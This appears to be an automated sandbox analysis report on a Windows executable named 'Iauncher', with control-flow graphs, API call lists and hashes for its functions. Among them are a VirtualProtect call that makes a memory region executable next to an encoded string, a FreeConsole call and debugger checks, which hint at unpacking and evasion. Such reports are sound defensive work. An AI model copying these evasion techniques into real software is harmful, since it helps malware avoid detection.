                                                                                                                                                    control_flow_graph 21 5769bb-5769d4 22 5769d6-5769e6 call 57011d 21->22 23 5769ea-5769ef 21->23 22->23 29 5769e8 22->29 25 5769f1-5769fb 23->25 26 5769fe-576a24 call 578f33 23->26 25->26 31 576b97-576ba8 call 5662ac 26->31 32 576a2a-576a35 26->32 29->23 34 576a3b-576a40 32->34 35 576b8a 32->35 36 576a55-576a60 call 5745c0 34->36 37 576a42-576a4b call 566850 34->37 38 576b8c 35->38 47 576a6b-576a6f 36->47 48 576a62 36->48 46 576a4d-576a53 37->46 37->47 42 576b8e-576b95 call 5660d3 38->42 42->31 50 576a68 46->50 47->38 51 576a75-576a8c call 578f33 47->51 48->50 50->47 51->38 54 576a92-576aa4 call 575e56 51->54 56 576aa9-576aad 54->56 57 576aaf-576ab7 56->57 58 576ac8-576aca 56->58 59 576af1-576afd 57->59 60 576ab9-576abe 57->60 58->38 63 576aff-576b01 59->63 64 576b7c 59->64 61 576ac4-576ac6 60->61 62 576b70-576b72 60->62 61->58 66 576acf-576ae9 call 575e56 61->66 62->42 67 576b16-576b21 call 5745c0 63->67 68 576b03-576b0c call 566850 63->68 65 576b7e-576b85 call 5660d3 64->65 65->58 66->62 78 576aef 66->78 67->65 77 576b23 67->77 68->65 79 576b0e-576b14 68->79 80 576b29-576b2e 77->80 78->58 79->80 80->65 81 576b30-576b48 call 575e56 80->81 81->65 84 576b4a-576b51 81->84 85 576b74-576b7a 84->85 86 576b53-576b54 84->86 87 576b55-576b67 call 578faf 85->87 86->87 87->65 90 576b69-576b6f call 5660d3 87->90 90->62
                                                                                                                                                    APIs
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00576A42
                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00576B03
                                                                                                                                                    • __freea.LIBCMT ref: 00576B6A
                                                                                                                                                      • Part of subcall function 005745C0: RtlAllocateHeap.NTDLL(00000000,00564449,?,?,00568DF4,?,?,?,?,?,005621CC,00564449,?,?,?,?), ref: 005745F2
                                                                                                                                                    • __freea.LIBCMT ref: 00576B7F
                                                                                                                                                    • __freea.LIBCMT ref: 00576B8F
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1423051803-0
                                                                                                                                                    • Opcode ID: 88cdc78730163c30d78f619839e2a5bd8191e3acd855ad70fc20a28e66253f45
                                                                                                                                                    • Instruction ID: 75ccacdb1abb48a8ce29557907a02f3490e0a1303acd1e7ae797188e494db110
                                                                                                                                                    • Opcode Fuzzy Hash: 88cdc78730163c30d78f619839e2a5bd8191e3acd855ad70fc20a28e66253f45
                                                                                                                                                    • Instruction Fuzzy Hash: B551A072600616AFEB249FA4AC85EBB3EA9FF45750B198529FD0CE7110E771CD10A7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 93 561e76-561ea7 call 5642b1 call 562577 call 562ae8 100 561edb-561ee8 call 564309 93->100 101 561ea9-561eab 93->101 102 561eb1-561eb8 call 562a82 101->102 103 561ead-561eaf 101->103 107 561ebd-561ec2 102->107 103->100 108 561ec4-561ed5 call 5645fc 107->108 109 561ee9-561eee call 5632eb 107->109 108->100
                                                                                                                                                    APIs
                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00561E82
                                                                                                                                                    • int.LIBCPMT ref: 00561E95
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::_Lockit.LIBCPMT ref: 00562588
                                                                                                                                                      • Part of subcall function 00562577: std::_Lockit::~_Lockit.LIBCPMT ref: 005625A2
                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 00561EC8
                                                                                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00561EDE
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 459529453-0
                                                                                                                                                    • Opcode ID: 3550a822abc965a789baebbff62daa528c0e1feb9f1ab96713201f58ec4a026f
                                                                                                                                                    • Instruction ID: b08145c148209b20beb3ba9e91ed4e9f7ad7c21ee88023089aeb25c7748c419f
                                                                                                                                                    • Opcode Fuzzy Hash: 3550a822abc965a789baebbff62daa528c0e1feb9f1ab96713201f58ec4a026f
                                                                                                                                                    • Instruction Fuzzy Hash: 6A01A732900515ABCB15AB94D91A8BD7FBCFF947A0F240155FD01AB390EB71DE41DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 115 5657bd-5657dd 116 5657df-5657e6 call 5657a3 115->116 117 5657e8-5657ef 115->117 125 56583d-56584b call 5662ac 116->125 119 565811-565815 117->119 120 5657f1-5657fb 117->120 123 565817-565826 call 565419 119->123 124 56583a 119->124 120->119 122 5657fd-56580f 120->122 122->125 130 56584e-565883 123->130 131 565828-56582c call 564c2e 123->131 124->125 137 565885-565888 130->137 138 5658a9-5658b1 130->138 134 565831-565835 131->134 134->124 135 565837 134->135 135->124 137->138 139 56588a-56588e 137->139 140 5658b3-5658c4 call 56f796 138->140 141 5658ca-5658d4 138->141 139->124 143 565890-56589f call 564c2e 139->143 140->124 140->141 141->124 142 5658da-5658dd 141->142 142->125 143->124 148 5658a1-5658a7 143->148 148->124
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Fputc
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 3078413507-4155469514
                                                                                                                                                    • Opcode ID: 69c29add2eba79d023c5cacbbff842d8ee6a7904a38d9cb75cf1a9ae746c1dc1
                                                                                                                                                    • Instruction ID: 705a367a39f8e696eb0b1248b13a4680adb09eaa7f2071aaf29ce5dc3e0bed5f
                                                                                                                                                    • Opcode Fuzzy Hash: 69c29add2eba79d023c5cacbbff842d8ee6a7904a38d9cb75cf1a9ae746c1dc1
                                                                                                                                                    • Instruction Fuzzy Hash: 2C41923695161AEBCF15DFA4C9848EDBBB8FF18354F644026E901A7A40FB31ED45CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00561F47: _strlen.LIBCMT ref: 00561F5F
                                                                                                                                                    • VirtualProtect.KERNELBASE(005DC030,000004AC,00000040,?,006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@), ref: 00583468
                                                                                                                                                    • FreeConsole.KERNELBASE ref: 0058346E
                                                                                                                                                    Strings
                                                                                                                                                    • 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@, xrefs: 00583427
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                                    • String ID: 006:107@4:@00007:277@0:@004:@04:@008:@08:@08:@8:@7:2@3:@9:193@4:@
                                                                                                                                                    • API String ID: 1248733679-32248209
                                                                                                                                                    • Opcode ID: 3acd037dd55afd264a69eee25bd8bd1e22b7fb3f69173a479e0a34af0da480b0
                                                                                                                                                    • Instruction ID: 8803ce2b956c4dde3d8f0f85293b6ea025fad8f0b7333dcd1c93298929facdba
                                                                                                                                                    • Opcode Fuzzy Hash: 3acd037dd55afd264a69eee25bd8bd1e22b7fb3f69173a479e0a34af0da480b0
                                                                                                                                                    • Instruction Fuzzy Hash: 52018F30A01206DBDB14FBA4EC1EBAE7FA4BB45B00F508526E901FB191EE649A05CB55
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 166 575e56-575e65 call 575988 169 575e67-575e8c LCMapStringEx 166->169 170 575e8e-575ea8 call 575eb3 LCMapStringW 166->170 174 575eae-575eb0 169->174 170->174
                                                                                                                                                    APIs
                                                                                                                                                    • LCMapStringEx.KERNELBASE(?,00576AA9,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 00575E8A
                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00576AA9,?,?,00000000,?,00000000), ref: 00575EA8
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: String
                                                                                                                                                    • String ID: SV
                                                                                                                                                    • API String ID: 2568140703-4155469514
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00570E0D,00000000,0056AAD2,?,?,940D2BD2,0056AAD2,?), ref: 00570E24
                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00570E0D,00000000,0056AAD2,?,?,940D2BD2,0056AAD2,?), ref: 00570E2B
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00570E3D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00577870: GetConsoleOutputCP.KERNEL32(940D2BD2,00000000,00000000,00000000), ref: 005778D3
                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,0058D558,00000000,0000000C,00000000,00000000,?,00000000,0058D558,00000010,0056F70D,00000000,00000000,00000000), ref: 0057828F
                                                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 00578299
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ConsoleErrorFileLastOutputWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2915228174-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00579BEA: GetOEMCP.KERNEL32(00000000,?,?,00000000,?), ref: 00579C15
                                                                                                                                                    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00579F01,?,00000000,?,00000000,?), ref: 0057A11B
                                                                                                                                                    • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00579F01,?,00000000,?,00000000,?), ref: 0057A15D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CodeInfoPageValid
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 546120528-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,00578275,00000000,00000000,00000000,?,0000000C,00000000), ref: 00577DC4
                                                                                                                                                    • GetLastError.KERNEL32(?,00578275,00000000,00000000,00000000,?,0000000C,00000000,00000000,?,00000000,0058D558,00000010,0056F70D,00000000,00000000), ref: 00577DEA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 442123175-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 005756F6
                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 00575708
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    • Associated: 0000000B.00000002.1282221168.0000000000560000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282309727.0000000000584000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005C4000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1282753451.00000000005DC000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                    • Associated: 0000000B.00000002.1283537777.00000000005DD000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                    • Opcode ID: 2ee5921308400156a606f52b4a7670dd123f84d7c95d24549cae5a69776b55da
                                                                                                                                                    • Instruction ID: 89cd0dbb67124cd34e30728e2606b3413bc552ec5bc03b8f6122bdc5b0c3ccb3
                                                                                                                                                    • Opcode Fuzzy Hash: 2ee5921308400156a606f52b4a7670dd123f84d7c95d24549cae5a69776b55da
                                                                                                                                                    • Instruction Fuzzy Hash: 3A11E771504F1186CB344A3EAC886267E95F7563B0B34471DD9BAC71F1E2B0C885B641
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetCPInfo.KERNEL32(E8458D00,?,00579F0D,00579F01,00000000), ref: 00579CF0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1807457897-0
                                                                                                                                                    • Opcode ID: 8c954caa28a69af80de79f57de26dda47d61cc37d7384658e5895a76d9334143
                                                                                                                                                    • Instruction ID: 19ef95856742848eafab58b782dcc91f06e0f618460c714b3b4e2f507f8f9cbe
                                                                                                                                                    • Opcode Fuzzy Hash: 8c954caa28a69af80de79f57de26dda47d61cc37d7384658e5895a76d9334143
                                                                                                                                                    • Instruction Fuzzy Hash: BB5157B55042589ADB318A28EC84BE67FBCFB56304F2485ADE59ED7142D2309D46EF30
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cbab0a42871b9ea937295d23351b8a16228e7d71d31c0010a697f62726289bda
                                                                                                                                                    • Instruction ID: a998edc0cfed4071d67828e03e80ac55391737848ca88787199ff4e9356242c7
                                                                                                                                                    • Opcode Fuzzy Hash: cbab0a42871b9ea937295d23351b8a16228e7d71d31c0010a697f62726289bda
                                                                                                                                                    • Instruction Fuzzy Hash: B601F5337006119B9B128E29FC8595B3BA6BBC53243288530FD0DEB194FA70C800E790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00564449,?,?,00568DF4,?,?,?,?,?,005621CC,00564449,?,?,?,?), ref: 005745F2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: db3f682a09f0bf732fdf7f43a21ebfcd24be71fef9f30e32c3bf9046a9a42b61
                                                                                                                                                    • Instruction ID: 428bdc8e2a89e143c35d20dc400db54ec0777545bea17be05bd25ebc3c94e04e
                                                                                                                                                    • Opcode Fuzzy Hash: db3f682a09f0bf732fdf7f43a21ebfcd24be71fef9f30e32c3bf9046a9a42b61
                                                                                                                                                    • Instruction Fuzzy Hash: 09E06535101236A7E7212A65BD05F5B3E99BF827B0F15C520BD0D9A191DF20DC00BEE5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,2000000B,0057CC6F,00000002,00000000,?,?,?,0057CC6F,?,00000000), ref: 0057C9EA
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,20001004,0057CC6F,00000002,00000000,?,?,?,0057CC6F,?,00000000), ref: 0057CA13
                                                                                                                                                    • GetACP.KERNEL32(?,?,0057CC6F,?,00000000), ref: 0057CA28
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                    • Opcode ID: c80178f70466929f71f528bbdf458f152e474148d50c14cdfaad13ce3f504c1a
                                                                                                                                                    • Instruction ID: 45478caaba0a80d430722199ddf6215c60e1025c950007917e33d186e39a60a4
                                                                                                                                                    • Opcode Fuzzy Hash: c80178f70466929f71f528bbdf458f152e474148d50c14cdfaad13ce3f504c1a
                                                                                                                                                    • Instruction Fuzzy Hash: 6521B272600105A6D770CB54E905AA77FA6BBA4B51B56C428EA0EEB200F732ED80F750
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0057CC32
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0057CC7B
                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0057CC8A
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0057CCD2
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0057CCF1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 415426439-0
                                                                                                                                                    • Opcode ID: ded4c110391e929042fdbfb1266477f3a20666795af59582e171cc6205aea00b
                                                                                                                                                    • Instruction ID: bd4523835d3b5a07b10c0f2802c72d96e5fdefb03b04c6156f1879f96741d5b4
                                                                                                                                                    • Opcode Fuzzy Hash: ded4c110391e929042fdbfb1266477f3a20666795af59582e171cc6205aea00b
                                                                                                                                                    • Instruction Fuzzy Hash: A651A271A002069BDF21DFA5EC49ABE7FB8BF54700F14846DA91DEB180E7709E44AB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,005717C6,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0057C283
                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,005717C6,?,?,?,00000055,?,-00000050,?,?), ref: 0057C2AE
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0057C411
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                    • String ID: utf8
                                                                                                                                                    • API String ID: 607553120-905460609
                                                                                                                                                    • Opcode ID: 4164da92a112a572d4f4baa9ddf91dd30f7939d8ed86995ca135d24dfdb39a58
                                                                                                                                                    • Instruction ID: 88d75c3615ef0f2ab5b081c3b020fa71d8a99a3f1552bdc153d4e4659c31158a
                                                                                                                                                    • Opcode Fuzzy Hash: 4164da92a112a572d4f4baa9ddf91dd30f7939d8ed86995ca135d24dfdb39a58
                                                                                                                                                    • Instruction Fuzzy Hash: 0A71F975600302AAEB24AB75EC4AB7A7FA8FF45710F14C42DF90DE7181EB70E940A761
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _strrchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3213747228-0
                                                                                                                                                    • Opcode ID: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
                                                                                                                                                    • Instruction ID: 42ad051388fbec0f6d81e1946b199e762bfbfe86021ed86e0408ff6f4cde26d7
                                                                                                                                                    • Opcode Fuzzy Hash: 45bf08c2e22f38f603408032c61045bde22d04295a5d25251943078c29725431
                                                                                                                                                    • Instruction Fuzzy Hash: D3B13332A002969FDB15CF68D881BEEBFA5FF55300F14C16AE908AB241D3349D01DFA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00566DAB
                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 00566E77
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00566E90
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00566E9A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                    • Opcode ID: d9db23792d5fdcc4bd2eabfb1f5f22b4dc6c91e4e6c753f5aa6f2435c84218cb
                                                                                                                                                    • Instruction ID: e3548d3d52100d88690d9c31a4eaa138dea909d6d36d60e15e2ff9a09c9d6ad0
                                                                                                                                                    • Opcode Fuzzy Hash: d9db23792d5fdcc4bd2eabfb1f5f22b4dc6c91e4e6c753f5aa6f2435c84218cb
                                                                                                                                                    • Instruction Fuzzy Hash: 8531F775D05219DBDF20DFA4D9897CEBBB8BF18300F1041AAE90CAB250EB719A849F45
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 005730E0: GetLastError.KERNEL32(?,00000008,00578F07,00000000,0056AC50), ref: 005730E4
                                                                                                                                                      • Part of subcall function 005730E0: SetLastError.KERNEL32(00000000,00000002,000000FF), ref: 00573186
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C629
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C673
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0057C739
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale$ErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 661929714-0
                                                                                                                                                    • Opcode ID: 749d7cff1390e09fccbf0b1025a79ec146285687ae3c4b9e22c72a59c8b20363
                                                                                                                                                    • Instruction ID: b198d9caa1a3253524c7da8cc2bf68587b641088579bf972e51ea2cb5da221b8
                                                                                                                                                    • Opcode Fuzzy Hash: 749d7cff1390e09fccbf0b1025a79ec146285687ae3c4b9e22c72a59c8b20363
                                                                                                                                                    • Instruction Fuzzy Hash: 9A618F716102179BEB289F28EC86BAA7FA8FF44300F10C16DED09D6185EB34D985EF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0056ABCB
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 0056ABD5
                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 0056ABE2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000B.00000002.1282245123.0000000000561000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00560000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_11_2_560000_Iauncher.jbxd
                                                                                                                                                    Yara matches
